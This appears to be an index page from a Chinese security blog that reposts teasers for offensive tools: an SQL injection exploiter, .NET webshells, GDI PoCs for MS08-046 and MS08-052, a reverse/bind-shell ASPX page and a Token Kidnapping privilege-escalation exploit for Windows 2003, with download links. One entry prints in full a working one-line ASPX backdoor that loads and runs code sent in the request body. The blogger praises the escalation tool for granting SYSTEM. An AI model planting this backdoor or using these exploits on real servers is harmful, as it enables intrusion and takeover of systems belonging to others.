Introduction
Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.
The Crawler modules allows the user to view the web site structure and gather all tamperable parameters. These parameters are then sent to the Tester module that tests all parameters for SQL injection vulnerabilities. If any are found, they are then sent to the Exploiter module that can exploit the injections to gather data from the database.
阅读全文 »
Tags: JAVA,
MySQL,
SQL Injection,
SQL注入
鬼仔注:刚从外面回来,看到cnqing在gtalk上给我的留言,只扔给一个链接。
作者:cnqing
软件说明:
程序包 包括一个基于反射的.net 一句话木马。
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
客户端 当前插件
文件管理
.net探针
CMDshell
端口转发
阅读全文 »
Tags: ASP.Net,
ASPX,
ASPXshell,
一句话马
EMR_SETICMPROFILEA Heap Overflow DOS
By Ac!dDrop
related to MS08-046
Tested on windows Xp professional Sp2
mscms.dll 5.1.2600.2709
gdi32.dll 5.1.2600.2818
阅读全文 »
Tags: MS08-046,
PoC
—————————————————————————————–
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
========================================================================
阅读全文 »
Tags: GDI+,
MS08-052
InsomniaShell is a tool for use during penetration tests, when you have ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either a reverse shell or a bind shell.
It has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation. InsomniaShell.zip
Tags: WebShell
作者:cnqing
ScanWriterable.aspx
<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>ScanWrtieable</title>
</head>
<body>
阅读全文 »
Tags: ASPX
鬼仔:提权很好用,直接system。文章末尾贴个TR那里的测试图。
编译好的:http://www.blogjava.net/Files/baicker/Churrasco.rar (via 009)
From:http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html
It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
阅读全文 »
Tags: Exploit,
PoC,
Token Kidnapping,
Windows 2003,
提权
